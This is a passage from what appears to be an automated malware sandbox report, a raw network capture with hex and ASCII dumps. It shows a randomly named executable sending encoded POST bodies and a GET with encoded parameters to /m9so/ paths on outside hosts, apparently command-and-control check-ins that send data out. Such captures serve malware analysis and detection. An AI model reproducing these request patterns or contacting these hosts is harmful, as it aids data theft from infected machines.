                                                                                    Mar 18, 2024 14:55:15.449445009 CET2572OUTData Raw: 4f 74 33 41 52 45 4d 7a 6d 6c 66 7a 78 45 57 44 61 51 61 44 6f 7a 47 35 6d 76 4b 51 66 41 70 68 53 72 48 6f 52 77 38 2f 6f 4f 76 35 7a 4e 47 70 35 2f 52 62 2f 46 42 63 6c 71 41 45 39 63 4f 6f 7a 79 34 65 56 64 35 46 31 74 55 77 74 56 50 4f 4e 59
                                                                                    Data Ascii: Ot3AREMzmlfzxEWDaQaDozG5mvKQfAphSrHoRw8/oOv5zNGp5/Rb/FBclqAE9cOozy4eVd5F1tUwtVPONY5r4RgODBTwWv9UDb+Wt9FGAH1k7KBRpDGTqWj7WkczJiwMSyLk7dgGxcuzs59bz2uP/KhlayJ7oYrbHn5uzEbInBpuoLvr9jL/WgO/OXjC3DEAHMI23LOF+2Ny1mulqOwRpnzK+yH6xCchT3wdAOBvsGs/8Dl2ksR
                                                                                    Mar 18, 2024 14:55:15.763619900 CET169INHTTP/1.0 500 Internal Server Error
                                                                                    Date: Mon, 18 Mar 2024 13:55:15 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 0
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=UTF-8


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    41192.168.11.2049838198.177.123.106807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:17.783108950 CET537OUTGET /m9so/?LFPxWlV=tjvw02avMThAA8QJc7LpbKc0nVcyZYwiX1IZCpHHMcL/Cok/Fa8Xeiv0sI0YHyzKdXCYczJiWU6WICcQRxIhuBT/mPwaKCG7CcvbddJeMhWanndbuRu1+zE=&OBLTJ=U4yhXH6x-jhX HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Host: www.alpinebretech.life
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Mar 18, 2024 14:55:18.075850964 CET548INHTTP/1.1 404 Not Found
                                                                                    Date: Mon, 18 Mar 2024 13:55:17 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    42192.168.11.204983946.30.215.63807756C:\Program Files (x86)\ERtdTuDynHEWlexRohovBzgsqckTyNaQESBJWivIAgzOBz\aBVmlEGlXzPgSgzWbUWNbhsRlSOqo.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:23.264523029 CET796OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 204
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 34 38 53 73 58 34 54 71 5a 75 47 78 6c 45 78 75 52 66 56 72 58 7a 33 75 54 2f 37 37 64 32 74 4c 45 71 50 66 47 4d 76 46 2b 57 31 70 4d 48 37 68 31 36 58 56 2b 49 37 4a 5a 77 68 58 6c 39 65 4c 36 34 55 43 53 54 51 78 46 39 78 6c 38 37 62 59 47 71 67 52 57 4f 33 73 50 5a 68 46 76 63 6d 52 54 52 77 78 43 6d 39 62 34 54 44 4b 62 6e 31 65 57 74 37 76 5a 42 7a 73 45 70 38 76 64 54 58 75 57 4a 2f 4d 64 58 66 65 57 36 4b 55 62 78 56 2b 7a 46 33 37 45 36 54 56 4c 7a 44 53 62 6a 58 6c 48 47 63 68 7a 58 49 2f 71 39 71 67 6d 66 6f 56 67 38 33 69 66 67 4e 57 4e 50 73 44 67 78 4d 74 67 3d 3d
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGxlExuRfVrXz3uT/77d2tLEqPfGMvF+W1pMH7h16XV+I7JZwhXl9eL64UCSTQxF9xl87bYGqgRWO3sPZhFvcmRTRwxCm9b4TDKbn1eWt7vZBzsEp8vdTXuWJ/MdXfeW6KUbxV+zF37E6TVLzDSbjXlHGchzXI/q9qgmfoVg83ifgNWNPsDgxMtg==
                                                                                    Mar 18, 2024 14:55:23.445348024 CET805INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 14:05:23 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:55:23 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:55:23 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55945926979
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    43192.168.11.204984046.30.215.6380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:27.140060902 CET1136OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 544
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 34 38 53 73 58 34 54 71 5a 75 47 77 46 30 78 73 33 58 56 6a 58 7a 32 68 7a 2f 37 69 74 32 70 4c 45 57 50 66 43 30 2f 46 4e 69 31 73 64 58 37 67 30 36 58 62 65 49 37 47 35 77 6b 49 56 39 42 4c 36 30 36 43 53 2f 51 78 46 70 78 6b 4a 76 62 5a 32 71 76 66 32 4f 32 37 2f 5a 6b 58 66 63 57 52 54 4e 57 78 48 47 39 62 72 58 44 4c 61 4c 31 61 48 74 30 2b 4a 42 31 6b 6b 70 39 30 4e 54 5a 75 57 46 64 4d 63 76 70 65 67 4b 4b 55 36 52 56 35 7a 46 6f 69 6b 36 71 4b 62 79 32 53 35 79 49 71 32 71 32 6c 67 7a 7a 6c 62 6b 53 69 47 6e 46 63 43 41 5a 35 74 67 33 65 2b 4b 4f 4f 68 38 68 31 6d 30 6d 4a 72 50 31 54 58 5a 41 4e 45 6d 6c 65 68 4f 75 54 35 68 38 76 63 34 46 56 6b 4e 37 55 4d 67 69 70 66 45 33 58 77 4f 69 5a 42 63 73 65 37 63 62 33 74 50 4c 37 4d 79 76 79 79 54 55 6b 42 6f 67 69 51 76 39 72 4e 59 6f 66 4c 4a 48 74 59 50 72 78 6c 4d 52 67 39 5a 70 4f 39 4e 7a 50 6d 6a 45 38 78 30 76 51 49 75 6c 45 37 6a 37 35 63 32 5a 2f 52 6c 37 72 61 36 66 79 4b 4b 35 42 79 36 4e 31 62 62 73 67 73 49 55 55 30 31 70 4c 54 6f 4d 6e 34 69 4b 39 51 59 2b 50 30 71 62 63 64 51 4c 59 4b 42 4c 4a 31 47 6e 55 30 42 6f 54 53 32 67 50 6a 4a 32 51 33 51 51 4b 7a 51 4d 57 66 41 4a 49 67 4d 59 58 79 49 38 55 66 43 32 48 6e 34 54 58 69 78 2b 6b 45 69 56 31 36 72 53 52 78 65 68 44 37 79 6d 79 6e 56 6b 35 48 6a 34 79 30 54 58 6c 48 65 68 48 7a 72 7a 55 68 65 53 6c 35 45 57 37 74 71 31 35 70 55 59 77 42 65 67 53 4b 47 77 42 4c 77 7a 32 4b 41 7a 65 57 6a 58 4a 59 66 33 66 48 76 70 37 47 68 79 42 72 38 6a 6c 55 61 77 61 42 2f 44 34 2b 37 54 38 6a 78 31 68 41 47 38 56 6c 51 69 6d 5a 43 78 62 70 39 52 74 65 33 52 4d 78 34 3d
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGwF0xs3XVjXz2hz/7it2pLEWPfC0/FNi1sdX7g06XbeI7G5wkIV9BL606CS/QxFpxkJvbZ2qvf2O27/ZkXfcWRTNWxHG9brXDLaL1aHt0+JB1kkp90NTZuWFdMcvpegKKU6RV5zFoik6qKby2S5yIq2q2lgzzlbkSiGnFcCAZ5tg3e+KOOh8h1m0mJrP1TXZANEmlehOuT5h8vc4FVkN7UMgipfE3XwOiZBcse7cb3tPL7MyvyyTUkBogiQv9rNYofLJHtYPrxlMRg9ZpO9NzPmjE8x0vQIulE7j75c2Z/Rl7ra6fyKK5By6N1bbsgsIUU01pLToMn4iK9QY+P0qbcdQLYKBLJ1GnU0BoTS2gPjJ2Q3QQKzQMWfAJIgMYXyI8UfC2Hn4TXix+kEiV16rSRxehD7ymynVk5Hj4y0TXlHehHzrzUheSl5EW7tq15pUYwBegSKGwBLwz2KAzeWjXJYf3fHvp7GhyBr8jlUawaB/D4+7T8jx1hAG8VlQimZCxbp9Rte3RMx4=
                                                                                    Mar 18, 2024 14:55:27.335293055 CET805INHTTP/1.1 200 OK
                                                                                    Cache-Control: max-age:600, public
                                                                                    Content-Length: 454
                                                                                    Expires: Mon, 18 Mar 2024 14:05:27 GMT
                                                                                    Last-Modified: Mon, 18 Mar 2024 13:55:27 GMT
                                                                                    Date: Mon, 18 Mar 2024 13:55:27 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    X-Onecom-Cluster-Name:
                                                                                    X-Varnish: 55995663007
                                                                                    Age: 0
                                                                                    Via: 1.1 webcache2 (Varnish/trunk)
                                                                                    Connection: close
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 22 77 77 77 2e 6d 61 6e 75 70 61 69 6e 74 2e 63 6f 6d 22 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 30 3b 0a 09 70 61 64 64 69 6e 67 3a 30 3b 0a 7d 0a 69 66 72 61 6d 65 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 09 68 65 69 67 68 74 3a 20 31 30 30 76 68 3b 0a 09 77 69 64 74 68 3a 20 31 30 30 76 77 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 20 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 3c 70 3e 59 6f 75 72 20 75 73 65 72 20 61 67 65 6e 74 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 73 2e 20 48 6f 77 65 76 65 72 20 79 6f 75 20 6d 61 79 20 76 69 73 69 74 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 6e 74 75 72 61 2e 6d 79 70 72 65 73 74 61 2e 73 68 6f 70 2f 6d 39 73 6f 2f 22 3e 74 68 65 20 70 61 67 65 20 74 68 61 74 20 77 61 73 20 73 75 70 70 6f 73 65 64 20 74 6f 20 62 65 20 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 69 66 72 61 6d 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE html><html><head><title>"www.manupaint.com"</title><style type="text/css">body {margin:0;padding:0;}iframe {display: block;border: none;height: 100vh;width: 100vw;}</style></head><body><iframe src= "https://pintura.mypresta.shop/m9so/"><p>Your user agent does not support iframes. However you may visit <a href="https://pintura.mypresta.shop/m9so/">the page that was supposed to be here</a></p></iframe></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                    44192.168.11.204984146.30.215.6380
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 18, 2024 14:55:29.842281103 CET2572OUTPOST /m9so/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.manupaint.com
                                                                                    Origin: http://www.manupaint.com
                                                                                    Referer: http://www.manupaint.com/m9so/
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 52932
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4
                                                                                    Data Raw: 4c 46 50 78 57 6c 56 3d 72 34 38 53 73 58 34 54 71 5a 75 47 77 46 30 78 73 33 58 56 6a 58 7a 32 68 7a 2f 37 69 74 32 70 4c 45 57 50 66 43 30 2f 46 4d 61 31 73 50 50 37 68 58 69 58 59 65 49 37 4c 5a 77 6c 49 56 39 49 4c 35 45 32 43 53 44 71 78 47 52 78 6c 65 6a 62 65 46 43 76 56 57 4f 31 34 2f 5a 6d 46 76 63 34 52 54 52 34 78 48 53 48 62 34 4c 44 4b 61 37 31 65 30 46 37 32 35 42 7a 6b 6b 70 35 69 39 53 73 75 57 52 4e 4d 63 54 70 65 6d 53 4b 47 34 5a 56 38 6b 5a 6f 36 45 36 70 45 37 79 44 62 5a 79 48 71 32 2b 36 6c 67 7a 46 6c 66 38 53 69 42 7a 46 4e 78 59 65 67 4e 67 33 58 65 4b 4a 4b 68 77 39 31 67 52 6c 4a 71 37 31 54 56 70 41 66 55 6d 6c 61 45 69 74 56 5a 68 36 6b 38 35 4e 52 6b 42 6a 55 4d 45 58 70 61 63 33 57 41 71 69 5a 77 63 73 64 65 6f 62 72 64 50 4a 31 73 79 61 6e 43 53 4c 6b 42 34 38 69 51 50 48 72 4e 73 6f 46 70 42 48 6f 35 50 6f 35 6c 4d 62 35 39 5a 38 4b 39 42 76 50 67 44 41 38 78 30 42 51 4a 71 6c 45 4b 7a 37 34 64 32 65 34 42 6c 67 2f 71 36 4f 72 61 47 2f 42 79 6d 56 31 61 54 38 67 76 6b 55 4f 55 31 70 64 6b 63 50 76 49 69 42 77 77 5a 68 53 45 72 54 63 64 63 74 59 4f 5a 62 4a 45 36 6e 56 45 78 6f 58 43 32 6e 4c 44 4a 79 48 6e 52 62 4f 7a 51 4d 57 66 63 37 49 67 51 59 43 58 6b 38 56 76 79 32 4d 51 6b 54 52 69 78 38 6b 45 6a 4a 31 36 32 6b 52 78 57 44 44 36 43 66 79 6c 35 6b 34 57 54 34 78 78 76 55 30 6e 65 6b 4e 54 71 7a 4b 52 43 37 6c 35 59 4f 37 73 61 44 35 2b 73 59 78 46 36 67 57 4b 47 7a 54 37 77 34 7a 36 41 66 61 57 76 4c 4a 59 44 42 66 45 7a 35 37 41 42 79 43 73 63 30 38 57 76 74 59 79 6a 34 37 38 44 4d 32 31 74 59 71 69 4b 72 59 45 51 6a 6e 70 57 31 5a 59 38 59 31 73 33 48 59 6e 65 42 2b 41 4c 4d 35 74 57 71 46 52 5a 2b 62 66 4c 44 64 2b 6c 4e 5a 41 7a 55 64 65 31 41 62 68 68 71 46 6e 55 48 47 41 4a 34 2b 75 4a 7a 2f 5a 70 6f 36 46 4f 6c 66 76 6f 2b 6a 42 6e 32 76 42 75 48 56 4c 66 7a 5a 32 34 39 74 62 4c 66 69 5a 31 55 65 6f 4b 46 4c 74 69 6c 45 66 30 37 6f 2f 63 72 31 48 4d 4d 52 78 65 4c 35 36 4c 31 49 58 39 61 39 51 44 57 47 51 54 58 33 6b 49 6b 63 43 71 78 2f 33 43 51 35 41 4e 32 4c 64 46 65 52 79 73 4b 59 2b 70 4e 77 62 78 4c 32 6d 70 5a 6d 63 39 48 72 6f 33 6c 43 4e 74 59 78 2f 34 66 49 77 44 64 63 6b 48 4b 5a 38 57 6a 78 52 46 2b 4f 4d 6e 4b 59 62 59 6d 6a 33 72 6a 2f 44 38 45 54 6c 6c 66 37 53 45 69 2b 4f 79 66 61 6e 2f 78 63 2f 61 75 34 7a 74 6e 7a 76 79 39 67 36 72 39 64 59 4e 32 35 51 73 37 73 63 6c 51 61 52 75 32 6c 73 75 58 71 65 79 74 36 36 65 36 31 41 50 6b 4a 64 44 66 45 31 2b 33 35 72 37 45 71 72 76 62 36 76 49 59 7a 6a 62 4e 47 61 54 72 42 4a 49 6c 51 4a 54 38 33 71 45 68 78 46 44 59 37 53 51 30 45 46 37 71 30 2f 71 41 53 46 6e 2f 61 4e 66 51 62 31 45 6f 54 65 76 53 37 72 41 78 67 78 7a 52 4d 45 4d 37 53 75 54 6b 38 61 6c 39 52 78 78 57 4e 46 55 64 67 46 61 4f 42 58 72 46 35 55 72 30 37 47 51 42 59 64 65 6d 6c 4f 4f 35 46 42 42 32 6b 45 74 47 66 31 59 71 35 36 69 37 49 42 36 35 65 35 61 53 62 49 58 6c 68 4b 75 70 4a 2b 4b 65 67 59 42 6a 6c 68 35 2f 68 50 46 31 4d 7a 32 34 38 51 4f 30 72 2f 2b 51 32 6c 4d 30 74 44 5a 73 76 54 66 35 4a 78 5a 41 4d 31 6f 2f 41 72 33 54 4e 2f 55 70 4e 31 5a 6f 4d 6c 64 4c 78 56 41 61 42 73 66 6a 74 73 6f 31 4a 56 55 79 4b 4d 32 50 54 78 2f 34 2b 70 47 74 59 41 2b 53 64 37 36 33 4a 6f 4c 67 67 42 36 2b 77 79 38 62 53 31 53 55 2b 41 74 75 55 46 78 53 5a 41 32 35 68 49 4b 6a 6c 4e 56 67 62 4f 33 45 6e 52 73 63 54 49 39 56 70 33 43 2b 72 2b 47 70 2f 4e 77 4b 36 71 59 49 53 4a 67 51 77 52 44 31 50 4b 6d 67 2f 74 76 49 35 78 61 57 45 77 65 6d 77 49 54 67 4b 50 37 62 62 63 65 46 49 4a 56 72 77 70 4f 69 6e 30 56 64 6b 59 41 36 37 6e 68 55 47 74 69 43 4c 49 55 47 50 51 68 30 55 64 4c 4b 76 68 5a 47 45 62 6b 79 76 79 42 43 36 67 61 56 2b 73 73 68 34 61 48 4b 62 68 49 31 4e 35 52 30 43 79 73 36 48 74 31 62 4c 6e 67 37 77 30 41 79 36 6a 66 59 70 68 46 67 39 62 35 73 39 6a 6c 4d 35 37 67 43 67 66 53 59 6e 72 32 44 46 48 67 41 54 36 6d 52 4a 30 56 4f 41 59 53 42 6f 69 39 31 36 46 74 4f 61 6d 6b 53 38 6b 38 63 37 67 35 7a 4b 6a 4c 39 41 7a 41 7a 32 6d 77 63 63 47 30 64 43 76 64 49 7a 46 55 6b 70 6e 39 77 37 70 2f 66 65 30 51 52 6a 75 53 63 55 30 64 58 62 57 75
                                                                                    Data Ascii: LFPxWlV=r48SsX4TqZuGwF0xs3XVjXz2hz/7it2pLEWPfC0/FMa1sPP7hXiXYeI7LZwlIV9IL5E2CSDqxGRxlejbeFCvVWO14/ZmFvc4RTR4xHSHb4LDKa71e0F725Bzkkp5i9SsuWRNMcTpemSKG4ZV8kZo6E6pE7yDbZyHq2+6lgzFlf8SiBzFNxYegNg3XeKJKhw91gRlJq71TVpAfUmlaEitVZh6k85NRkBjUMEXpac3WAqiZwcsdeobrdPJ1syanCSLkB48iQPHrNsoFpBHo5Po5lMb59Z8K9BvPgDA8x0BQJqlEKz74d2e4Blg/q6OraG/BymV1aT8gvkUOU1pdkcPvIiBwwZhSErTcdctYOZbJE6nVExoXC2nLDJyHnRbOzQMWfc7IgQYCXk8Vvy2MQkTRix8kEjJ162kRxWDD6Cfyl5k4WT4xxvU0nekNTqzKRC7l5YO7saD5+sYxF6gWKGzT7w4z6AfaWvLJYDBfEz57AByCsc08WvtYyj478DM21tYqiKrYEQjnpW1ZY8Y1s3HYneB+ALM5tWqFRZ+bfLDd+lNZAzUde1AbhhqFnUHGAJ4+uJz/Zpo6FOlfvo+jBn2vBuHVLfzZ249tbLfiZ1UeoKFLtilEf07o/cr1HMMRxeL56L1IX9a9QDWGQTX3kIkcCqx/3CQ5AN2LdFeRysKY+pNwbxL2mpZmc9Hro3lCNtYx/4fIwDdckHKZ8WjxRF+OMnKYbYmj3rj/D8ETllf7SEi+Oyfan/xc/au4ztnzvy9g6r9dYN25Qs7sclQaRu2lsuXqeyt66e61APkJdDfE1+35r7Eqrvb6vIYzjbNGaTrBJIlQJT83qEhxFDY7SQ0EF7q0/qASFn/aNfQb1EoTevS7rAxgxzRMEM7SuTk8al9RxxWNFUdgFaOBXrF5Ur07GQBYdemlOO5FBB2kEtGf1Yq56i7IB65e5aSbIXlhKupJ+KegYBjlh5/hPF1Mz248QO0r/+Q2lM0tDZsvTf5JxZAM1o/Ar3TN/UpN1ZoMldLxVAaBsfjtso1JVUyKM2PTx/4+pGtYA+Sd763JoLggB6+wy8bS1SU+AtuUFxSZA25hIKjlNVgbO3EnRscTI9Vp3C+r+Gp/NwK6qYISJgQwRD1PKmg/tvI5xaWEwemwITgKP7bbceFIJVrwpOin0VdkYA67nhUGtiCLIUGPQh0UdLKvhZGEbkyvyBC6gaV+ssh4aHKbhI1N5R0Cys6Ht1bLng7w0Ay6jfYphFg9b5s9jlM57gCgfSYnr2DFHgAT6mRJ0VOAYSBoi916FtOamkS8k8c7g5zKjL9AzAz2mwccG0dCvdIzFUkpn9w7p/fe0QRjuScU0dXbWuMkLYVFUEz7QkZZVSA84HbOtuGGOSIXjj6lmAIcPGI1A1sStFARTr3Gu8XB0LCMSA7Czf0f9vFIPN81jZ6fnuxsSfJph/ImE9cFOdGui6bPIr8/613EiyIYGeRsS+VLyhJtLL5HUu+bs7MCD14HtURX1i4id0hSFxSxvjDN1YGPAsKe1Jiqfyk6+BmfV2vLGFoZkk+zHPh5iRob1ysstNYetTEdhYUxFGCX5ca70SYNlqhw8wipq82g06iV46dKiAGgXnhPr1XFl1Z4lzTYMWQ+Y8o4LmU0IX9yTj9x2srw3O0Z2b5Lrb3aJoz6NCapCCsIq75rpj2gUY/Rm10+vbHizWqg/zn4CX1mi6QEK2+th3W8uG+bKiepljRLhcWft18rEKoXELS9P1AXulkZmSmWOoQGHR/dV9SHilPlhHU7huB/dRKw+boACVr9sBCEeRCOVCihC008HvK7qNARKbKhFYqnYq0knZD7hPBH7ajh5LPQtoHXVOI1Jdn/lA1oxY3Os3a3LKquAJfbA9NRWrUh2WKcVsv5e4xmaLn2gjeG7XBQUTFPS3ALiw59wxHeUttN7QrQ/tRZ3W6BkjLv3123s7b5gvnNlikPDuvd2
                                                                                    Mar 18, 2024 14:55:29.842307091 CET5144OUTData Raw: 34 73 74 54 4f 42 77 7a 71 73 6d 5a 74 77 48 38 6d 34 6e 59 36 79 6e 6f 6a 6e 79 79 6f 49 34 45 2f 67 4e 35 2f 4b 73 4e 38 41 43 57 48 42 33 33 79 43 2f 77 77 57 78 4f 56 50 6b 36 69 7a 42 58 67 69 34 4d 63 77 71 49 49 42 55 45 50 4f 39 41 4e 45
